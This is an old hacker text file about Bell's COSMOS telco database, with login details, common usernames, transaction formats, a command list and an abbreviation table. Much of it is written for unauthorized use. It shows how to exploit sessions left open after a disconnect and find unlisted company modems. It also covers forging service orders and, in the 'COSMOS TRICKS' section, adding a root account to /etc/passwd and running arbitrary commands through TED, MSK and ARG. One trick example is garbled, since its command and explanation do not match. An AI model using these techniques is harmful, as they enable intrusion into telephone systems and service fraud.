The Definitive Cosmos PRELUDE In the past, many files have been written about COSMOS. I have always been rather disappointed in their quality and in their presentation, so I have taken on the responsibility of doing one myself. This should sum up COSMOS for everyone who reads it. It contains formats for very useful commands, an entire transaction list, COSMOS "tricks", and a list of all COSMOS abbreviations and their formats. INTRODUCTION Bell Labs COmputer System for Mainframe OperationS (COSMOS) is basically just a database for maintaining records of equipment and other line information and generating reports on that information. The system is usually set up on a DEC PDP 11/45 or 11/70. The main responsibilities of the COSMOS system are: Maintaining records Issuing reports Processing service and work orders Assigning telephone numbers Load balancing for switching computers Output of ESS recent change information LOGGING ON When connecting to COSMOS the system will respond with: ;Login: or LOGIN: at which point you enter a username. The system will then prompt: PASSWORD: at which point you enter the password for that username. Finally, the system will prompt: WC? which asks you to enter the wire center for the exchange you will be using in your work. After successfully completing the login sequence you will be given the system prompt which will be the two letter id of the wire center you entered and a percent sign: "WC% " To log off at this or at any point you can type control-y. One of the major flaws in COSMOS security is that unless a control-y is received the terminal is not logged out, even if the user disconnects. Many times when you connect to COSMOS, you will be dropped right into the "WC% " prompt. This even happens on major BOC packet networks quite often. If you are lucky enough to receive a 'WC#' prompt you have access to the COSNIX shell, and can issue various unix-like commands, like ls, cd, cat, et cetera. COSMOS usernames are usually issued as two letters corresponding to whatever center will be using that account, and two numbers. EX: LA01 Using the above example "LA01" there will most probably be numerous "LA" accounts, possibly "LA01" through "LA15" or higher. This is true for most COSMOS usernames. More often than not, all accounts used by the same center will have the same password as well. Some common usernames and their owners are: ROOT System Manager SYS System Manager ML Loop Assignment LA Loop Assignment DN Main Distributing Frame IN Repair Service RS Repair Service CE LNAC LK Account to execute INQuiries only JA Mizar WLI Work Load Indicator Usernames may vary from BOC to BOC, but these are fairly standard. ============================================================================= COSMOS TRANSACTION COMMANDS COSMOS commands are three letter acronyms. I will explain in depth the commands I have found most useful, and then list the remainder. Remember, do not attempt to learn the formats for COSMOS transactions online. You will probably not figure out correct inputs, and will most likely cause problems for the system manager and yourself. Commands are entered in a specific ways. The command desired is entered at the WC% prompt. A second string of data is entered at the next line which designates the type of transaction desired. This line is prefixed with on of the following four letters: H - Header Line I - In Line O - Out Line R - Remark Line The most commonly used line is the H line. It is a required input in almost all COSMOS transactions. From the second line on, COSMOS will prompt with an underscore "_" as the system prompt, to let the user know that it is waiting for input. When all needed data has been entered, the command is executed by typing a "." at the beginning of a new line. If you wish to process a command, but stay in command level in order to process further commands after the one you are currently entering has finished, a ";" can be entered at the beginning of a new line. To cancel the transaction you are entering, a "Q" should be entered at the beginning of a new line. To interrupt output, the break character is "^C". When entering criteria, you may enter all like data (all H-line, all I-line, etc...) on one line using a "/" between input prefixes: EX: H TN 222-0000,222-9999/RMKT SWBT?/US 1FB is the same as entering: H TN 222-0000,222-9999 _H RMKT SWBT? _H US 1FB One of the most commonly used commands is INQ (Complete Circuit Inquiry). There is also a short form of INQ called ISH. This command requires only the use of H lines. Multiple H lines can be entered to narrow a search or to print multiple reports. Valid H line facilities used are: BL Bridge Lifter CON Concentrator CP Cable Pair CKID Circuit ID MR Message Register OE Office Equipment Number PL Private Line Circuit Number TK Trunk Cable and Pair Number TN Telephone Number TP Tie Pair XN "X" Number TRE Transmission Equipment TER Terminal Number GP Group Number ORD Work Order EX: To print information on telephone number 222-2222 WC% INQ H TN 222-2222 _. EX: To print information on cable pair 11-1111 WC% INQ H CP 11-1111 _. INQ will print a full report whatever circuit you examine, while ISH will print a shorter, easier to read report. Below is an actual ISH done on a Telenet node. CA% ISH H TN 225-8004 _. TN 225-8004 ST AU DATE 06-03-83 HT GP 0-0081 BTN 225-8004 TYPE X OE 006-012-200 ST WK DATE 03-04-86 CS 1FBH US 1BH FEA TNNL LCC TF2 LOC WF12003 TER 0-0081-0001 ST WK RMKG GTE.TELENET CP 95-0701 ST WK DATE 01-24-86 RZ 13 LOC WF12009 TP 6105-0910 ST WK DATE 01-24-86 LOC F12003 LOC F42001 FROM FAC OE 006-012-200 TO FAC TP 6206-0107 TP 6206-0107 ST WK DATE 01-24-86 LOC F22029 LOC F42002 HUNT SEQUENCE FOR TN 225-8004 TER 0001-0040 ** ISH COMPLETED 02-29-99 12:00 CA% When you pull an inquiry on a number that you are interested in, you will be given its cable pair, its order number, any numbers that connect to it through a hunt sequence, and you will see any remarks entered about the number. This information can prove to be very valuable. For instance: You suspect that a company has a modem online, yet you don't want to waste time sequentially dialing thousands of numbers. You can simply enter an ISH on the number to get its cable pair, then begin pulling ISH reports on cable pairs close to the main one. Then you need only dial twenty or so numbers that are in the same area as the main number, and you will find the computer. Another extremely valuable command is SIR (Sorting Inquiry by Range). With SIR, you can print the circuit information on all lines that match specified criteria within a specified range of numbers. This command requires only H line input, but numerous lines may be entered in order to narrow down the search. You may also use the wildcard character ("?") to encompass a larger range when doing a SIR. There are many applications for SIR, but I will only show examples on a few I have found to be most useful. Many times entries have special remarks entered about the circuit. These are usually entered as RMKT (Remarks on Telephone Number), but they may be entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable Pair), depending upon what the person entering felt like typing. Most of the time the remarks really don't correspond like they should. Telephone companies are pretty thorough about remarking on a line that they own and they will usually use the RMKT prefix. EX: To find all telephone company (Southwestern Bell) lines in prefix 222 WC% SIR H TN 222-0000,222-9999 _H RMKT SWBT? _. The "?" after SWBT acts as a wildcard. Typing SWB? would perform the same search. You may also want to search by STT (Telephone number status). Some types of STT are: AU Auxiliary NP Non-published OF Official (telco owned) TS Test Another way to distinguish types of number is by CS (Customer Class of Service). CS values tend to vary from BOC to BOC, but business lines will usually look like "1FB", or at least contain a "B". Residences will usually look like "1FR." Sometimes telco lines are listed as "1OF", but may also be entered as "1FB". On lines in a hunt group, the CS will be appended with the letter "H", as "1FBH". Let's say a company owns a block on an exchange (333) running from 1000 to 3500. You want to find all possible computer numbers in that area. Chances are good that they are not listed. EX: WC% SIR H TN 333-1000,333-3500 _H STT NP _H CS 1FB _. The above would list all non-published business numbers from 333-1000 to 333-3500. To find all numbers that are translated 800 numbers in the same prefix range as above, you can do the following: EX: WC% SIR H TN 333-1000,333-3500 _H PL ?800? _. This will prints reports on all private lines registered as 800 numbers. There is also a shorter version of SIR, LTN (List Telephone Numbers), and a more detailed version, GFR (General Facility Report), but I have found SIR to be the better of the three to use for my purposes. In order to change line attributes, or to create new lines you will need to use two commands SOE (Service Order Entry), and RCP (Recent Change Packager). These two commands are pretty detailed in what they can do, so I will just cover a few of their options. SOE will allow you to assign a new circuit, and specify the desired telephone number, custom calling features, billing telephone number, etc. SOE requires both "H" and "I" lines of input. The best way to enter a new service order is to have COSMOS pick your new telephone number and assign the needed office equipment number. If you want to pick your own telephone number, the number you pick must have a status (STO) of SP, LI, RS, or PD (with a disconnect date before the due date on your new service order). This is so that you do not try to assign a number that is currently working to your new service order. You can check this by doing an ISH on all the variations of numbers you desire, and checking the STO. You can also get a list of available numbers in a given prefix using the NAI command. You should also do a SIR of recent entries, to try to find the proper format of order numbers, so that you do not reuse one, or make one up that is formatted incorrectly. Another method to make sure that you have the correct formatting of order numbers is to call the phone company and request the installation of a line in the area you are working in. They will tell you your service order number for reference. Later, you can merely cancel the order. You will also have to find a valid cable pair, so do an ISH on whatever number written in your junction box that is not working, and then make sure there is no pending connect orders entered on it. To enter a service order for a new connection, having COSMOS pick an available telephone number and assign proper office equipment numbers, you would do the following: EX: WC% SOE H ORD SO123456/OT NC/DD DD-MM-YY (Use valid Day, Month, Year for Due Date) _I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY (Use valid cable pair for XX-YYYY) _. You would now need to enter RCP and make a correctly formatted recent change report for the order you entered so RCMAC can pick up the order and directly enter it into the switch. What RCP does is take your order and change it into actual switch programming, using templates that are stored in directories corresponding to what type of switching equipment is used for that WC. (EX: ess5a) EX: To create a recent change package for the order entered above WC% RCP H ORD SO123455 _. Using SOE you can specify custom calling features, you can specify billing telephone numbers, you can establish service as coin, and several other options by adding "I" line information corresponding to that particular option. _I CCF XXXXXX (XXXXXX is valid custom calling features) _I BTN NNX-XXXX (NNX-XXXX is valid billing TN) _I TT C To get a list of spare (available) telephone numbers in a given prefix, you can use the NAI (Telephone Number Assignment Inquiry) command. You only need enter H line criteria. In addition to searching by prefix (NNX), you can search by switch type (TYP), or rate zone (RTZ). EX: To select one spare telephone number in 555 and make it reserved status WC% NAI H TT X/NNX 555/STT RS _. You may also have NAI print out several available numbers, however, you cannot change the status unless you are printing one listing. EX: WC% NAI H TT X/NNX 555/LC XX (Where XX is a number between 1 and 25) _. To get a listing of all prefixes that exist in the Wire Center you are logged in under, you can use the command DDS (Display DS Table). This command will list the ranges that exist for a given input. To list all telephone numbers in a given WC: WC% DDS H TN ? _. To list all cable pair ranges: WC% DDS H CP ? _. To change from one Wire Center to another, you use the command WCC (Wire Center Change). This is a very straight forward command. EX: WC% WCC NW NW% To allow for redirection in your COSMOS commands, you must execute the DIO command. This command is rather important for manipulating commands to work for you. EX: WC% DIO To see what transactions other people logged in are running, you can use the command TSNAP (on certain generics) EX: WC% TSNAP There are about one hundred other COSMOS commands that are all defined at the end of this file. I cannot go into detail on all of them but I will list them and their meanings. ============================================================================= COSMOS TRICKS Even if you don't have full COSNIX access, you can basically execute any command or read any file that exists in the system. Using the INQ (or ISH) command and redirection, you can open and display any file. EX: To display the password file WC% INQ >/etc/passwd This will add user EB01 to the end of the password file. If you do not have access to echo you can do the same thing using the TED command (Text Editor). WC% TED >>/etc/passwd S.O. NO.= SO123456 IS THIS A NEW S.O. (Y on NO) Y 1d a EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so ^C 1p w q After executing the above, you will need to clean up the /etc/passwd file to remove the Service Order information put in there by TED. You will also need to remove the service order you created from the /usr/so/WC directory. If you cannot find a way to get shell access, you can still execute any COSNIX command you desire again using TED, MSK (Output a Transaction Mask), and ARG (Assemble and Run a Given Master File). EX: WC% TED S.O. NO.= SO123456 IS THIS A NEW S.O. (Y or NO) Y 12 1d a $* run! ^c w q WC% MSK >/usr/so/newcmd SO123456 WC% ARG newcmd ls /etc To execute the command, you need to do ARG, then the name of the file (which I called newcmd), then the COSNIX command you wish to execute. If you can use echo this can be done much easier. EX: WC% echo '$*' >/usr/so/newcmd WC% echo 'run!' >>/usr/so/newcmd Then you can run your command normally with ARG. WC% ARG newcmd cd .. IF you do not have access to echo, create a newcmd file and you can use it that way. WC% ARG newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd ============================================================================= COSMOS COMMAND LISTING ACE Establish an Assignment Change Ticket AIT ANALIT Initialization of Tables ARG Assemble and Run a Given Master File AUD Assignment List Audit BAI Bridge Lifter Assignment Inquiry BYF Display the Bypass File BYP Change the Contents of the Bypass File CAY Create an Assembly CCA Change Customer Attributes CCT Initialize and Update the Contractor-Transducer File CDA Change Distribution Attributes CDD Change Due Date CDR Cut Thru DIP Report CFA Change Facility Attributes CFP Print the Class of Service/Features for an Electromechanical Entity CFU Change Facility Usage CIE Company Establish Company Initiated Change CLI COSMOS Processed ALIT Reports CPI COSMOS-PREMIS Interface CPM COSMOS Performance Monitor CTC Complete a Cable Transfer or Complete a Cable Throw CTE Cable Throw Order Establishment CTF Display the Contacter-Transducer File CTL Cable Throw with Line Equipment Assignment CTM Cable Throw Modification CTP Print Cable Transfer Frame Work CTR Cable Throw Replacement CTS Cable Throw Summary CTW Withdraw a Cable Transfer or a Cable Throw CUP Common Update Processor CXC Complex Service Order Input Checker CXM Centrex Table Management CXT Complex Order Inquiry for NAC Review DAY Delete an Assembly DBL Data Base Load DCN List Disconnected and Changed Numbers DDS Display the DS Table DIR Standard DIP Report DPN DIP Purge Number DPR DIP Report and Removal DQR Design Quota System Report DQS Design Quota System DTE Print Current Date EDZ Facility Emergency Assignment List ELA Entity Load Analysis ESP Print Entire Summary Table FDY Set Fiscal Day for LAC FLR Frame Layout Report FOR Frame Order Report FOS Frame Operations Summary FTA Frame Transfer Analysis FTC Frame Transfer Completion FTE Frame Transfer Establishment FTL Frame Transfer LETs FTR Frame Transfer Reprint FTW Frame Transfer Withdrawal FWM Frame Work Management GFR General Facility Report GLA Generate Lists for Assignment HBS Hunt Group Blocks of Spares HGR Hunt Group Report HGS Hunt Group Summary HIS Hunting ISH IJR Input a Jeopardy Reason IMU Input Measured CCS Usage Data INQ Complete Circuit Inquiry ISF Inquire on a Single Facility ISH Complete Circuit Inquiry Short JAM Jumper Activity Management JPH Jumper Placement History KPR Killer Pair Report KSM Create a Transaction Mask LAI Line Equipment Assignment Inquiry LBP Load Balance Parameters LCD LIST Cable Summary, LIT Demand Test LCP List Cable Pairs LEE NAC Related Line Equipment Transfer Order Establishment LEW Line Equipment Transfer Withdrawal LFC Load Factor Calculation LFR Line Failure Report LGN List Hunt Groups LIN Transmit ALIT Data to COSMOS LOE List Originating Line Equipment LSE Line and Station Transfer Order Establishment LSW Line and Station transfer Withdrawal LTN List Telephone Numbers MAL Manual Assignment List MAP Manual Assignment Parameters MAQ Manual Assignment File Inquiry MAY Modify an Assembly MCE Establish a Maintenance Change Ticket MCH Manually Change Hunt MCL Maintenance Change List MCR Establish a Maintenance Change Repair MCW Maintenance Change Ticket Withdrawal MDC Manually Disconnect a Working Circuit MEC Manually Establish a Circuit MMC Manually Modify a Circuit MOC MOE Order Completion MOE Mass OE Transfers MOF Mass OE Frame Transfer Listings MOW MOE Order Withdrawal MPK Modify Work Package MSK Output a Transaction Mask MTR Manually Test a Response NAI Telephone Number Assignment Inquiry NOL NAC Service Order Listing NSD Number Summary Display OIJ Orders in Jeopardy OPN Open-of-Day Report OPU Outside Plant Cable Usage PAK Work Packages PEP Position Establishment for Parties PFR Party Line Fill Report PRP Periodic Purging of Remarks QEX Question an Execution QUE Queue RAL Relay Assignment List RAP Relay Assignment Parameters RAS Release Sequence Number Lists and Related TN/OE RBS Print TBS Relays Assignment Record RCP Recent Change Packager RCR Recent Change Report RCS Recent Change Summary RED Recent Change Message Text Editor REL Release Non-Intercepted Numbers by Release Date REM Remove Frame Locations RET Retermination of Frame Locations REX Reexecute a Service Order RJR Remove Jeopardy Reason Codes RMP Recent Change Punctuation Table RNA Release Telephone Numbers for Assignment ROE Reservation Order Establishment ROI Reservation Order Inquiry ROW Reservation Order Withdrawal RTH Report Transaction to Count Spare and DIPed Line Equipment RTS Relay and Telephone Number Status Report RUP Request Unsolicited Processing SAI Summary of Action Items SCA Service Order Completion-Automatic SCF Simple Completion for MDF SCI Spare Cable Pair Inquiry SCM Standard Completion by MDF SCP Service Order Completion by LAC SCR Standard Completion by RCMAC SEL Selecting Lines for an Exchange Class of Service Study SET Statistics on Equipment and Telephone Numbers SGH Supply Relays for Groups of 5XB Hunts SIR Sorting Inquiry by Range SLC Subscriber Line Counts for Custom Calling Features SOC Service Order Cancel SOE Service Order Establishment SOF Service Order Fix SOH Service Order Withheld SOI Service Order Assignment Inquiry SOL Service Order Listing SOM Modify a Pending Service Order SOW Service Order Withdrawal STN Summarize Telephone Numbers SVL Service Observing Loops TAI Tie Pair Assignment Inquiry TAT Test Alignment of Frame Terminal TED Text Editor TET Display or Change Band Filter File, Retention Factor and Print Threshold TFC Transfer Frame Changes TIG Dial Transfer Input Generator TLC Translate LANAVAR/CPS TNS Telephone Number Swap TOC Transfer Order Completion TOE Transfer Order Establishment TOF Mass OE Transfer Order Frame Listings TOI Dial Transfer Order Inquiry TOL Transfer Order Lists TOO Transfer Order Omissions TOW Transfer Order Withdrawal TPU Tie Pair Usage Report TRC Transfer Order Recent Change Report TRI Transmission Equipment Assignment Inquiry TRW Total Reservation Order Withdrawal TSL Line Equipment Summary Report TSN Traffic Statistics on Telephone Numbers TSW Total Service Order Withdrawal TTY Get TTY Name TXC Text Checker TXM Transfer Centrex Management UDP Update DIP Parameters UES Update the Entity Summary Table UFO Unprinted Frame Orders UPC Update CCS vs. Class of Service Table USL List USOC (US) File Data UTC Update Table for Concentrator Redesign WCC Change Wire Center WCT Worksheet for Cable Throw Orders WFL Working Frame Location WOI Work Order Inquiry WOL Work Order Listing WPT Work Package Table WSL Work Status List WUL Work Unit Report for Subscriber Line Testing and Installation Assignment ============================================================================= COSMOS ABBREVIATIONS AND FORMATS The following will be given as follows: Prefix and Meaning Format Code Value and Meaning AC Assembly category AC XXXX PERM=Permanent Facility Assemblies TEMP=Temporary Facility Assemblies AC Assembly Code AC XXX XXX=1-999 ADSR Administration of Designed Services Review ADSR X Y=Yes, TIRKS Circuit N=No, COSMOS Circuit AGM Normal Aging Months AGM XX XX=Number of Months AGT Accelerated Aging Type AGT XXX BUS=Business RES=Residential AI Assigner's Initials AI XXX XXX=3 Alphanumeric Characters AO Allocation Order AO XX XX=Two Numeric Characters AR Advance Relay AR XYY-ZZZ X=Marker Group YY=Number Group from Frame ZZZ=Relay Number ATN Assigner's Telephone Number ATN XXX-XXXX XXX-XXXX=Assigners TN BL Bridge Lifter BL XX...XX XX...XX=Maximum of 17 Alphanumeric Characters BLS Bridge Lifter Status BLS X Y=Yes N=No BND Band Number BND X X=0-3 BTN Billing Telephone Number BTN XXX-XXXX XXX-XXXX=Billing Telephone Number CA Cable Number CA XX...XX XX...XX=Maximum of 10 Alphanumeric Characters CAT Centrex Access Treatment CAT XX XX=Maximum of 2 Numeric Characters CC Call Count CC XX XX=Maximum of 2 Numeric Characters CCF Custom Calling Features CCF XXXXXX XXXXXX=3 to 6 Alphanumeric Characters CCS Hundred Call Seconds CCS XXXX XXXX=3 or 4 Numeric Characters CEU CCS Estimated Usage CEU XXXX XXXX=3 or 4 Numeric Characters CG Control Group Number CG X X=0-9 CKID Circuit Identification CKID XX...XX XX..XX=Maximum of 61 Alphanumeric Characters CKL Circuit Location CKL XXXX XXXX=Maximum of 4 Alphanumeric Characters CLC Common Language Code for an Entity CLC XX...XX XX...XX=Maximum of 11 Alphanumeric Characters CLCI Common Language Circuit Identification CLCI XX...XX XX...XX=Maximum of 61 Alphanumeric Characters CLEI Common Language Equipment Identifier CLEI XX...XX XX...XX=Maximum of 10 Alphanumeric Characters CLF Creating DIPs Upper Bound Load Factor CLF XX XX=1-10 CLL Creating DIPs Lower Bound Load Factor CLF X X=1-9 CLS CLCI in Serial Number Format CLS XX...XX XX..XX=Maximum of 61 Alphanumeric Characters CLT CLCI Telephone Number Format CLT XX...XX XX...XX=Maximum of 61 Alphanumeric Characters CMF Capacity Main Station Fill CMF XXXXXX XXXXXX=Maximum of 6 Numeric Characters CMU CCS Measured Usage CMU XXXX XXXX=3 or 4 Numeric Characters COM Complement Size COM XXXX XXXX=1-9999 CON Concentrator CON XX-YY XX=Maximum of 2 Alphanumeric Characters YY=Maximum of 2 Numeric Characters CP Cable and Pair Number CP XX...XX-YZZZ XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters YZZZ=Cable Pair ID Y=Alphanumeric ZZZ=Numeric CPU CCS Capacity Usage CPU XXXX XXXX=3 or 4 Numeric Characters CRG CREG Tag CRG XXX XXX=YES or NO CS Customer Class of Service CS XXXXXX XXXXXX=Maximum of 6 Alphanumeric Characters CTID Circuit Termination Identification CTID XX...XX XX...XX=Maximum of 61 Alphanumeric Characters CTT Cut Through Tag CTT XXX XXX=YES or NO CTX Centrex Group Number CTX XXXX XXXX=Maximum of 4 numeric Characters DC Dial Code DC X X=1 Alpha Characters DD Due Date DD MM-DD-YY MM=Month DD=Day YY=Year DID Direct Inward Dialing DID XXXX XXXX=Maximum of 4 Numeric Characters DIP DIP Creation Option DIP X Y=Yes N=No DNY Denial of Service for Non-payments DNY X I=Incoming O=Outgoing B=Both DPA Different Premises Address DPA XXX XXX=Maximum of 3 Alphanumeric Characters DPT Department Name DPT XXX XXX=Maximum of 3 Alphanumeric Characters DST Destination of Order Response DST XXXX XXXX=Maximum of 4 Alphanumeric Characters DT Due Time DT XX XX=AM, PM, or 0-9 EC ESS Entity and Control Group Number EC YZ Y=Entity Number Z=Control Group Identifier ECS Equipment Class of Service ECS XXXXXX XXXXXX=Maximum of 6 Alphanumeric Characters ED Enter Date ED MM-DD-YY MM=Month DD=Day YY=Year EN Entity EN X X=S, E, 1, 5 or 0 EN Entity Number EN X X=0-9 ENT Entity Number ENT X X=0-9 EO Error Handling Option EO XX CE=Continue Processing and Establish Valid Circuits CW=Continue Processing and Withdraw Established Circuits SE=Stop Processing and Establish Valid Circuits SW=Stop Processing and Withdraw Established Circuits EQF Equipment Features EQF WXYZ W=R (Rotary) or T (Touchtone) Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension) X=E (Essential) or N (Non-essential) Z=G (Ground Start) or L (Loop Start) EQV Frame Equivalence EQV FXX F=The Letter "F" XX=Two Alphanumeric Characters ETC Estimated Trunk CCS Value ETC XXXX XXXX=Maximum of 4 Alphanumeric Characters EXD ECS Crossloading Option EXD XXX XXX=YES or NO FAC Type of Segment List Being Audited FAC XX TN=Telephone Number OE=Line Equipment FAC Circuit Confiruration FAC XXX or FAC TN-NNX or FAC CP-XX...X or FAC SE-YY...Y or FAC PL-ZZ...Z XXX=Any Facility Prefix NNX=Three Alphanumeric Characters XX...XX=Maximum of 10 Alphanumeric Characters YY...YY=Maximum of 52 Alphanumeric Characters ZZ...ZZ=Maximum of 61 Alphanumeric Characters FC From Cable FC XX...XX XX...XX=Maximum of 10 Alphanumeric Characters FDD Frame Due Date FDD MM-DD-YY MM=Month DD=Day YY=Year FEA Customer Feature FEA XXXX (Same as EQF) FILT Filter FILT XXX XXX=Y, YES, N, or NO FR Frame Identification FR FXX F=The letter "F" XX=Two Alphanumeric Characters FT Frame Time FT XX XX=01-24 FW MDF Output Suppressed FW X Y=Frame Work Yes N=Frame Work No GP MLHG Group Number GP Y-XXXX Y=Alphanumeric Control Group XXXX=Numeric Group Number GSO Ground Start Option GSO X 1=Assigned to any OE in the Entity 2=Assigned to Even Levels 3=Only Assigned to OE Specified as Ground Start HC Hunt Count HC XXXX XXXX=Maximum of 4 Numeric Characters HF Hunt-from Telephone Number HF XXX-XXXX XXX-XXXX=Telephone Number HLC Highest Lead Factor Group Count HLC XXXX XXXX=1-9999 HR Held Order Reason Code HR XX CE=Equipment Shortage CF=Lack of Facility CL=Plant Load CO=General Company Reasons C1-C5-Additional Company Reasons SA=Subscriber Access SL=Subscriber Requested Later Date SO=General Subscriber Reasons SR=Subscriber Not Ready S1-S5=Additional General Subscriber Reasons HRS Hours Prefix HRS XX XX=01-24 HT Hunt-to Telephone Number HT XXX-XXXX XXX-XXXX=Telephone Number HTG Hunt-to Group Number HTG Y-XXXX Y=Alphanumeric Control Group XXXX=Numeric Group Number HTX Hunt-to X Number HTX XXX-YYXX of HTX XXX-YXX Y=Alphanumeric X=Numeric INIT Allocation Table Initalization INIT (No Data Entry) ITM Cable Pair Item Number ITM XX XX=Two Numeric Characters JL Jumper Length JL XXX XXX=Maximum of 3 Numeric Characters JR Jeopardy Reason JR XX A1=Assignment Error on CP A2=Assignment Error on OE A3=Assignment Error on TN A4-A9=Other Assignment Error C1=No SSWO for Circuit Design Group C2-C9=Local Code for Circuit Design Group E1-E9=No ESS Translations IB=No Installation Go-ahead for Business IC=No Installation Go-ahead for Coin ID=No Installation Go-ahead for Data IR=No Installation Go-ahead for Residence IS-No Installation Go-ahead for Special I1-I4=Local Codes foir No Installation Go-ahead RB=Business RSB RC=Coin RSB RD=Data RSB RR=Residence RSB RS=Special RSB R1-R4=Local Use for RSB LC Output Line Count LC XXXX XXXX=0-9999 LC Line Count LC XXX XXX=0-999 LC Pending Service Order Count LC (No Data Entry) LCC Line Class Code LCC XXX XXX Maximum of 3 Alphanumeric Characters LD Loading Division LD XX XX=Two Numeric Characters LDN Listed Directory Number LDN XXX-XXXX XXX-XXXX=Telephone Number LF Load Factor LF XX XX=1-10 LIM Less Than the Specified Number of Pairs LIM XX XX=0-50 LIM High Limit on Number of Specified Status Pairs in a Complement LIM XX XX=0-50 LIM Low Limit on Number of Spare Line Equipment in Vertical Files LIM XX LIM=1-10 LLC Low Load Group Count LLC XXXX XXXX=0-9999 LOC Location LOC FXXYYY F=The Letter "F" XX=Alphanumeric YYY=001-999 LP Loop Range LP XXX;XXX XXX;XXX=Six Numeric Characters LS List New Pending Cable Transfers LS XXX XXX=NEW LTI Loop Termination Identifier LTI XXX XXX=Three Alphanumeric Characters MASK Office Equipment Mask MASK OE ID ID=XXX-XXX-XXX =1ESS ID=XXX-XXXX =2ESS ID=XXX-XXXX =3ESS ID=XXXX-XXX-XX =5ESS ID=XXXX-XX-XX =5ESS ID=XXXX-X-XXXX =RSS ID=XXXX-XXX-XX =1XB ID=XXXX-XXXX-XX =1XB ID=XXX-XX-XX =5XB ID=XXXX-XXX =SXS ID=XXX-X-XX-X =DMS-10 ID=XXX-X-XX-XX -DMS-100 X=Alphanumeric MAT Manual Assistance Tag MAT XXX XXX=YES or NO MAX Maximum Percentage Value of Entity Fill or Maximum CCS Value MAX XXX XXX=Maximum of 3 Numeric Characters MBL Mini-bridge Lifter Tag MBL XX Y=MBL Working on CP N=CP Can't Support MBL EQ=CP has MBL Capabilities MC Marker Class of Service MC XX XX=Two Alphanumeric Characters MF Recent Change Message Format MF XXXX NEW=RX:LINE:messages OUT=RC:LINE:OUT:messages CHG=RC:LINE:CHG:messages SUSP=RC:LINE:CHG:messages of suspended service MF Jumper Listing for MDF MF XXX NEW=Running Jumper Listing DJ=Dead Jumper Listing MF Message Format When Completing Transfer Circuits with TOC MF XXX ALL=Message is Printed for Every Circuit in Range ERR=Message Printed Only for Circuits not Completed MF Message Format for Dial Transfer Number Lists MF XXX GVR=Transaction GFR Output Format, One Facility per Line LVT=Line Verification Test Format TLC=Two-line Condensed Format MG Marker Group Number MG X X=0-9 MIN Minimum Percentage Value of Entity Fill or Minimum CCS Value MIN XXX XXX=Maximum of 3 Numeric Characters MLP Multi-loop Resistance Zone Threshold MLP XX XX=Two Numeric Characters MOD Module Number MOD XXX XXX=Three Numeric Characters MODE Integrated SLC No. 5ESS Mode MODE X 1=5 T1 Carrier Channels 2=3 T1 Carrier Channels MPN Master Work Package Number MPN XXXX XXXX=1-9999 MR Message Register MR XXXXXX XXXXXX=Maximum of 6 Alphanumeric Characters MRO Message Register Option MRO XXX XXX=YES or NO MT Master Record Tape Unit Number or Tape Drive to Write MT X X=Numeric MTR Tape Drive to Read MTR X X=Numeric MTW Tape Drive to Write MTW X X=Numeric NAR NAC Assignment Review NAR XXX XXX=Maximum of 3 Numeric Characters NGF Number Group Frame for 5XB NGF XXX XXX=Three Numeric Characters NNX Telephone Exchange Code NNX XXX XXX=THree Numeric Characters NOE Number of OEs to be Assigned NOE X X=0 or 1 NPA Area Code and Exchange Number NPA XXXXXX XXXXXX=Six Alphanumeric Characters NRM Normalizing CCS VAlue NRM XX XX=0-99 NTN Number of TNs to be Assigned NTN X X=0 or 1 OA Line Equipment Assignment Option OA X Y=Yes N=No OC Order Category OC XXX ACT=Assignment Change Ticket ALL=All OE Load Factors CPC=Special Service FM=Count Since OE Input Features Occurrences FO=Count All OE Input Feature Occurrences HOT=Frame Ouput-urgent JR=Jeopardy Reason OCS Old Class of Service OCS XXXXXX XXXXXX=Maximum of 6 Alphanumeric Characters OD Output Device OD XXXX TT=Send Output to Current Terminal TTXX=Send Output to Specified Terminal XX MTX=Send Output to Magnetic Tape X OE Office Equpiment Number OE ID (See MASK) OGO Outgoing Only Trunk OGO XXX XXX=Maximum of 4 Numeric Characters OPT Party Assignment Option OPT X 1=Assign Multi-party Customers to Spare Party Equipment 2=Assign Multi-party Customer to Partially Equipped Party Equipment 3=Assign Only One Multi-Party Customer to each Single Party Equipment ORD Service or Work Order ORD XX...XX XX...XX=Maximum of 20 Alphanumeric Characters OT Service or Work Order Type OT XXX BT=Background Transfer CD=Complete Disconnect CH=Changed CIO=Company Initiated Orders F="FROM" LET=Line Equipment Transfers LST=Line and Station Transfers MCE=Maintenance Change by LAC MCR=Maintenance Change by Repair MCT=All Maintenance Changes NC=New Connect R=Remarks REA=Pending Reassociation SW=Swap T="TO" PBX Private Branch Exchange PBX XXXX XXXX=Maximum of 4 Numeric Characters PCID Primary Circuit Identification PCID XX...XX XX...XX=Maximum of 61 Alphanumeric Characters PKT Picket Fence Values PKT XXX.X,...,XXX.X XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or N=No New Values PL Private line Circuit Number PL XX...XX XX...XX=Maximum of 61 Alphanumeric Characters PNL PREMIS Number List for TN PNL XX...XX XX...XX=Maximum of 12 Alphanumeric Characters POP Line Equipment Print Option POP XXX CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS CNG=Concentrator Group-2ESS, 3ESS HG=Horizontal Group-5XBAR IM=Interface Module-5ESS LFG=Line Finder Group-SXS LLF=Line Link Frame-5XBAR LLN=Line Link Net-1ESS LTN=Line Trunk Net-2ESS LU=Link Unit Module-5ESS QC=Quarter Choice-1XBAR SW=Switch-1XBAR VF=Vertical FIle-5XBAR PR Cable Pair ID PR YXXX Y=Alphanumeric XXX=Numeric PRI Frame Priority PRI XX XX=Two Numeric Characters PRP Permanent Cable Pair Remarks PRP XX...XX XX...XX=Maximum of 14 Alphanumeric Characters PRZ Preferred Rate Zone PRT X X=Numeric PS Previously Published/Non-published Facility Indicator PS X N=Non-Published !=Published PT Package Time PT XXX XXX=Three Numeric Characters PTY Party Number or Position PTY X X=1-4 PTY Party Indicator PTY X R=Reserved O=Open PWC PREMIS Wire Center PWC XX...XX XX...XX=Maximum of 8 Alphanumeric Characters PWC Print Work Code PWC XXX NBT=No Back Tap COM=Frame Complete PBT=Print Back Tap RCT=Place Heat Coils on "TO" Pair RBT=Remove Back Tap RCF=Remove Heat Coils on "FROM" Pair VBT=Verify Back Tap USX=Locally Defined Codes (X=1-4) RAP Rotary Assignment Priority RAP 